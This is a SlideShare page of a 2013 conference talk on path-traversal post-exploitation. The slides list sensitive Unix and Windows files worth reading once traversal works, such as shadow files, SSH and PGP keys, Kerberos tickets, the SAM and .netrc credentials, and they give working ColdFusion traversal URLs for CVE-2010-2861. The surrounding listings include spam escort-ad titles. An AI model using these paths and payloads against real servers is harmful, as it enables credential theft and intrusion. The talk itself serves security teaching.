SlideShare una empresa de Scribd logo

4.1. Path traversal post_exploitation

defconmoscow
defconmoscow

Meeting #4.

Internet
1 de 22
Descargar para leer sin conexión
Path traversal post exploitation By George Lagoda Nov 23, 2013
This slide intentionally left blank (always dreamed of it )
Common understanding of path traversal A Path Traversal attack aims to access files and directories that are stored outside the web root folder. (OWASP) WHAT FILES AND DIRS OUTSIDE THE WEB ROOT DO WE NEED AND WHY?
/etc/passwd – why so special?
Y.O.B.A. hacking NEXT STEPS 1. /root/.bash_history if not accessible try harder: /home/username/.bash_history game me:
Looks like epic win??: After analyzing prepare_release.sh:
.netrc file • Provides remember me for ftp What I had when checked /home/username/.netrc : machine ftp.server.com login secret_usr password secret_pwd
Help for shell uploading /proc/self/environ /proc/self/status Useful if we wanna find access or error logs of Apache, document root of the server or we also have LFI and wanna exploit Apache log poisoning
Smtg fo crds • SSH keys, often passwordless: /home/*/.ssh/id* • Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab • PGP keys: /home/*/.gnupg/secring.gpgs
What distro we have? • /etc/SUSE-release # Novell SUSE • /etc/redhat-release, /etc/redhat_version # Red Hat • /etc/fedora-release # Fedora • /etc/slackware-release, • /etc/slackware-version # Slackware • /etc/debian_release, /etc/debian_version # Debian • /etc/mandrake-release # Mandrake • /etc/sun-release # Sun JDS • /etc/release # Solaris/Sparc • /etc/gentoo-release # Gentoo • /etc/arch-release # Arch Linux (file will be empty) • arch # OpenBSD; sample: “OpenBSD.amd64”
What about windows?
File Expected Contents / Description %SYSTEMDRIVE%boot.ini A file that can be counted on to be on virtually every windows host. Helps with confirmation that a read is happening. %WINDIR%win.ini This is another file to look for if boot.ini isn’t there or coming back, which is sometimes the case. %SYSTEMROOT%repairSAM %SYSTEMROOT%System32configR egBackSAM It stores users' passwords in a hashed format (in LM hash and NTLM hash). The SAM file in repair is locked, but can be retired using forensic or Volume Shadow copy methods %SYSTEMROOT%repairsystem %SYSTEMROOT%System32configR egBacksystem %SYSTEMDRIVE%autoexec.bat
%SYSTEMDRIVE%pagefile.sys Large file, but contains spill over from RAM, usually lots of good information can be pulled, but should be a last resort due to size %WINDIR%system32logfileshttperrhttperr1.log IIS 6 error log %SystemDrive%inetpublogsLogFiles IIS 7’s logs location %WINDIR%system32logfilesw3svc1exY YMMDD.log (year month day) %WINDIR%system32configAppEvent.Evt %WINDIR%system32configSecEvent.Evt %WINDIR%system32configdefault.sav %WINDIR%system32configsecurity.sav %WINDIR%system32configsoftware.sav %WINDIR%system32configsystem.sav %WINDIR%system32CCMlogs*.log %USERPROFILE%ntuser.dat
U really thought I will forget bout kittens?
• /etc/passwd • /etc/shadow (gotta try..) • /etc/shadow~ # (sometimes there when edited with gedit) • /etc/master.passwd • /etc/group • /etc/hosts • /etc/crontab • /etc/sysctl.conf • /etc/resolv.conf • /etc/samba/smb.conf • /etc/exports • /etc/auto.master • /etc/auto_maste • /etc/fstab • /etc/exports • /etc/sudoers
Some SW defaults http://wiki.apache.org/httpd/DistrosDefaultLay out
Also for cold fusion(not the last vers but still) ColdFusion 6: http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMXlibpassword. properties%00en ColdFusion 7: http://site/CFIDE/administrator/enter.cfm?locale=................CFusionMX7libpasswor d.properties%00en ColdFusion 8 http://site/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libpasswor d.properties%00en All versions: http://site/CFIDE/administrator/enter.cfm?locale=....................JRun4serverscfusio ncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en http://www.cvedetails.com/cve/CVE-2010-2861/
• In case if you still don’t have path traversal to post exploit it, may be this tool could be useful for you: http://dotdotpwn.blogspot.ru/
Why so serious?
Thank you for visiting us And HACK YOU  (the end).

Recomendados

Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attackPrashant Hegde
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Securityn|u - The Open Security Community
 
OOP Language Powerpoint
OOP Language PowerpointOOP Language Powerpoint
OOP Language PowerpointAngelia Nicole Dela Cruz
 
Computer Forensics & Windows Registry
Computer Forensics & Windows RegistryComputer Forensics & Windows Registry
Computer Forensics & Windows Registrysomutripathi
 
MindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetMindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetJuan F. Padilla
 
Windows Registry Analysis
Windows Registry AnalysisWindows Registry Analysis
Windows Registry AnalysisHimanshu0734
 
Registry Forensics
Registry ForensicsRegistry Forensics
Registry ForensicsSomesh Sawhney
 
Namespaces and Autoloading
Namespaces and AutoloadingNamespaces and Autoloading
Namespaces and AutoloadingVic Metcalfe
 

Recomendados

Introduction to path traversal attack
Introduction to path traversal attackIntroduction to path traversal attack
Introduction to path traversal attackPrashant Hegde
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Securityn|u - The Open Security Community
 
OOP Language Powerpoint
OOP Language PowerpointOOP Language Powerpoint
OOP Language PowerpointAngelia Nicole Dela Cruz
 
Computer Forensics & Windows Registry
Computer Forensics & Windows RegistryComputer Forensics & Windows Registry
Computer Forensics & Windows Registrysomutripathi
 
MindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetMindMap - Forensics Windows Registry Cheat Sheet
MindMap - Forensics Windows Registry Cheat SheetJuan F. Padilla
 
Windows Registry Analysis
Windows Registry AnalysisWindows Registry Analysis
Windows Registry AnalysisHimanshu0734
 
Registry Forensics
Registry ForensicsRegistry Forensics
Registry ForensicsSomesh Sawhney
 
Namespaces and Autoloading
Namespaces and AutoloadingNamespaces and Autoloading
Namespaces and AutoloadingVic Metcalfe
 
Windows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkWindows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkKapil Soni
 
Unit 7
Unit 7Unit 7
Unit 7siddr
 
4.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v24.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v2Acácio Oliveira
 
File System Hierarchy
File System HierarchyFile System Hierarchy
File System Hierarchysritolia
 
Flashack
FlashackFlashack
Flashackn|u - The Open Security Community
 
Nethemba metasploit
Nethemba metasploitNethemba metasploit
Nethemba metasploitOWASP (Open Web Application Security Project)
 
Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0Bandit S
 
File management in C++
File management in C++File management in C++
File management in C++apoorvaverma33
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssolaonap166
 
Fundamentals, ORM and Security
Fundamentals, ORM and Security Fundamentals, ORM and Security
Fundamentals, ORM and Security Tarikul Islam
 
File_Management_in_C
File_Management_in_CFile_Management_in_C
File_Management_in_CNabeelaNousheen
 
File Management in C
File Management in CFile Management in C
File Management in CMunazza-Mah-Jabeen
 
Fluentd introduction at ipros
Fluentd introduction at iprosFluentd introduction at ipros
Fluentd introduction at iprosTreasure Data, Inc.
 
File system hiearchy
File system hiearchyFile system hiearchy
File system hiearchysritolia
 
Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalationJameel Nabbo
 
SANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesSANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesPhil Hagen
 
Linux filesystemhierarchy
Linux filesystemhierarchyLinux filesystemhierarchy
Linux filesystemhierarchyDr. C.V. Suresh Babu
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014Nabil Munawar
 
What every data programmer needs to know about disks
What every data programmer needs to know about disksWhat every data programmer needs to know about disks
What every data programmer needs to know about disksiammutex
 
Tutorial 2
Tutorial 2Tutorial 2
Tutorial 2tech2click
 
Working with core dump
Working with core dumpWorking with core dump
Working with core dumpThierry Gayet
 
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Puppet
 

Más contenido relacionado

La actualidad más candente

Windows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkWindows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkKapil Soni
 
Unit 7
Unit 7Unit 7
Unit 7siddr
 
4.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v24.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v2Acácio Oliveira
 
File System Hierarchy
File System HierarchyFile System Hierarchy
File System Hierarchysritolia
 
Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0Bandit S
 
File management in C++
File management in C++File management in C++
File management in C++apoorvaverma33
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssolaonap166
 
Fundamentals, ORM and Security
Fundamentals, ORM and Security Fundamentals, ORM and Security
Fundamentals, ORM and Security Tarikul Islam
 
File system hiearchy
File system hiearchyFile system hiearchy
File system hiearchysritolia
 

La actualidad más candente (14)

Windows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility FrameworkWindows Registry Forensics with Volatility Framework
Windows Registry Forensics with Volatility Framework
 
Unit 7
Unit 7Unit 7
Unit 7
 
4.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v24.6 create and change hard and symbolic links v2
4.6 create and change hard and symbolic links v2
 
File System Hierarchy
File System HierarchyFile System Hierarchy
File System Hierarchy
 
Flashack
FlashackFlashack
Flashack
 
Nethemba metasploit
Nethemba metasploitNethemba metasploit
Nethemba metasploit
 
Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0Updating 2.0.18.1 To 2.3.0
Updating 2.0.18.1 To 2.3.0
 
File management in C++
File management in C++File management in C++
File management in C++
 
Openfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark ssoOpenfire xmpp server on windows server 2012 r2 with spark sso
Openfire xmpp server on windows server 2012 r2 with spark sso
 
Fundamentals, ORM and Security
Fundamentals, ORM and Security Fundamentals, ORM and Security
Fundamentals, ORM and Security
 
File_Management_in_C
File_Management_in_CFile_Management_in_C
File_Management_in_C
 
File Management in C
File Management in CFile Management in C
File Management in C
 
Fluentd introduction at ipros
Fluentd introduction at iprosFluentd introduction at ipros
Fluentd introduction at ipros
 
File system hiearchy
File system hiearchyFile system hiearchy
File system hiearchy
 

Similar a 4.1. Path traversal post_exploitation

Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalationJameel Nabbo
 
SANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesSANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesPhil Hagen
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014Nabil Munawar
 
What every data programmer needs to know about disks
What every data programmer needs to know about disksWhat every data programmer needs to know about disks
What every data programmer needs to know about disksiammutex
 
Working with core dump
Working with core dumpWorking with core dump
Working with core dumpThierry Gayet
 
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Puppet
 
Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guideCraig Cannon
 
Linux Common Command
Linux Common CommandLinux Common Command
Linux Common CommandJeff Yang
 
Live memory forensics
Live memory forensicsLive memory forensics
Live memory forensicsMehedi Hasan
 
Using filesystem capabilities with rsync
Using filesystem capabilities with rsyncUsing filesystem capabilities with rsync
Using filesystem capabilities with rsyncHazel Smith
 
Root file system for embedded systems
Root file system for embedded systemsRoot file system for embedded systems
Root file system for embedded systemsalok pal
 
Lamp1
Lamp1Lamp1
Lamp1Reka
 
Lamp
LampLamp
LampReka
 
CASPUR Staging System II
CASPUR Staging System IICASPUR Staging System II
CASPUR Staging System IIAndrea PETRUCCI
 

Similar a 4.1. Path traversal post_exploitation (20)

Linux advanced privilege escalation
Linux advanced privilege escalationLinux advanced privilege escalation
Linux advanced privilege escalation
 
SANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management DatabasesSANS @Night There's Gold in Them Thar Package Management Databases
SANS @Night There's Gold in Them Thar Package Management Databases
 
Linux filesystemhierarchy
Linux filesystemhierarchyLinux filesystemhierarchy
Linux filesystemhierarchy
 
Death matchtournament del2014
Death matchtournament del2014Death matchtournament del2014
Death matchtournament del2014
 
What every data programmer needs to know about disks
What every data programmer needs to know about disksWhat every data programmer needs to know about disks
What every data programmer needs to know about disks
 
Tutorial 2
Tutorial 2Tutorial 2
Tutorial 2
 
Working with core dump
Working with core dumpWorking with core dump
Working with core dump
 
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
Continuous Infrastructure: Modern Puppet for the Jenkins Project - PuppetConf...
 
Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guide
 
Linux Common Command
Linux Common CommandLinux Common Command
Linux Common Command
 
Live memory forensics
Live memory forensicsLive memory forensics
Live memory forensics
 
Mem forensic
Mem forensicMem forensic
Mem forensic
 
Using filesystem capabilities with rsync
Using filesystem capabilities with rsyncUsing filesystem capabilities with rsync
Using filesystem capabilities with rsync
 
Edubooktraining
EdubooktrainingEdubooktraining
Edubooktraining
 
Root file system for embedded systems
Root file system for embedded systemsRoot file system for embedded systems
Root file system for embedded systems
 
Solaris_quickref.pdf
Solaris_quickref.pdfSolaris_quickref.pdf
Solaris_quickref.pdf
 
Lamp1
Lamp1Lamp1
Lamp1
 
Lamp1
Lamp1Lamp1
Lamp1
 
Lamp
LampLamp
Lamp
 
CASPUR Staging System II
CASPUR Staging System IICASPUR Staging System II
CASPUR Staging System II
 

Más de defconmoscow

7.5. Pwnie express IRL
7.5. Pwnie express IRL7.5. Pwnie express IRL
7.5. Pwnie express IRLdefconmoscow
 
7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]defconmoscow
 
7.3. iCloud keychain-2
7.3. iCloud keychain-27.3. iCloud keychain-2
7.3. iCloud keychain-2defconmoscow
 
7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hackingdefconmoscow
 
7.1. SDLC try me to implenment
7.1. SDLC try me to implenment7.1. SDLC try me to implenment
7.1. SDLC try me to implenmentdefconmoscow
 
6.4. PHD IV CTF final
6.4. PHD IV CTF final6.4. PHD IV CTF final
6.4. PHD IV CTF finaldefconmoscow
 
6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jaildefconmoscow
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websitesdefconmoscow
 
6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protectiondefconmoscow
 
6. [Bonus] DCM MI6
6. [Bonus] DCM MI66. [Bonus] DCM MI6
6. [Bonus] DCM MI6defconmoscow
 
5.3. Undercover communications
5.3. Undercover communications5.3. Undercover communications
5.3. Undercover communicationsdefconmoscow
 
5.2. Digital forensics
5.2. Digital forensics5.2. Digital forensics
5.2. Digital forensicsdefconmoscow
 
5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]defconmoscow
 
5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt5. [Daily hack] Truecrypt
5. [Daily hack] Truecryptdefconmoscow
 
4.5. Contests [extras]
4.5. Contests [extras]4.5. Contests [extras]
4.5. Contests [extras]defconmoscow
 
4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardwaredefconmoscow
 
4.3. Rat races conditions
4.3. Rat races conditions4.3. Rat races conditions
4.3. Rat races conditionsdefconmoscow
 
4.2. Web analyst fiddler
4.2. Web analyst fiddler4.2. Web analyst fiddler
4.2. Web analyst fiddlerdefconmoscow
 
3.3. Database honeypot
3.3. Database honeypot3.3. Database honeypot
3.3. Database honeypotdefconmoscow
 

Más de defconmoscow (20)

7.5. Pwnie express IRL
7.5. Pwnie express IRL7.5. Pwnie express IRL
7.5. Pwnie express IRL
 
7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]7.4. Show impact [bug bounties]
7.4. Show impact [bug bounties]
 
7.3. iCloud keychain-2
7.3. iCloud keychain-27.3. iCloud keychain-2
7.3. iCloud keychain-2
 
7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking7.2. Alternative sharepoint hacking
7.2. Alternative sharepoint hacking
 
7.1. SDLC try me to implenment
7.1. SDLC try me to implenment7.1. SDLC try me to implenment
7.1. SDLC try me to implenment
 
6.4. PHD IV CTF final
6.4. PHD IV CTF final6.4. PHD IV CTF final
6.4. PHD IV CTF final
 
6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail6.3. How to get out of an inprivacy jail
6.3. How to get out of an inprivacy jail
 
6.2. Hacking most popular websites
6.2. Hacking most popular websites6.2. Hacking most popular websites
6.2. Hacking most popular websites
 
6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection6.1. iCloud keychain and iOS 7 data protection
6.1. iCloud keychain and iOS 7 data protection
 
6. [Bonus] DCM MI6
6. [Bonus] DCM MI66. [Bonus] DCM MI6
6. [Bonus] DCM MI6
 
5.3. Undercover communications
5.3. Undercover communications5.3. Undercover communications
5.3. Undercover communications
 
5.2. Digital forensics
5.2. Digital forensics5.2. Digital forensics
5.2. Digital forensics
 
5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]5.1. Flashback [hacking AD]
5.1. Flashback [hacking AD]
 
5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt5. [Daily hack] Truecrypt
5. [Daily hack] Truecrypt
 
4.5. Contests [extras]
4.5. Contests [extras]4.5. Contests [extras]
4.5. Contests [extras]
 
4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware4.4. Hashcracking server on generic hardware
4.4. Hashcracking server on generic hardware
 
4.3. Rat races conditions
4.3. Rat races conditions4.3. Rat races conditions
4.3. Rat races conditions
 
4.2. Web analyst fiddler
4.2. Web analyst fiddler4.2. Web analyst fiddler
4.2. Web analyst fiddler
 
3.3. Database honeypot
3.3. Database honeypot3.3. Database honeypot
3.3. Database honeypot
 
3.2. White hat
3.2. White hat3.2. White hat
3.2. White hat
 

Último

Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtrahman018755
 
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...SUHANI PANDEY
 
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableCall Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableSeo
 
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...nirzagarg
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...SUHANI PANDEY
 
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrHenryBriggs2
 
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...tanu pandey
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLimonikaupta
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdfMatthew Sinclair
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdfMatthew Sinclair
 
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...tanu pandey
 
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...SUHANI PANDEY
 
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...SUHANI PANDEY
 
( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...
( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...
( Pune ) VIP Baner Call Girls 🎗️ 9352988975 Sizzling | Escorts | Girls Are Re...nilamkumrai
 
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...SUHANI PANDEY
 
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)
WhatsApp 📞 8448380779 ✅Call Girls In Mamura Sector 66 ( Noida)Delhi Call girls
 

Último (20)

Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirt
 
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
 
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableCall Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
 
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
➥🔝 7737669865 🔝▻ mehsana Call-girls in Women Seeking Men 🔝mehsana🔝 Escorts...
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
 
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
 
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
 
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
 
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
 
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
Katraj ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready For S...
 
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
 
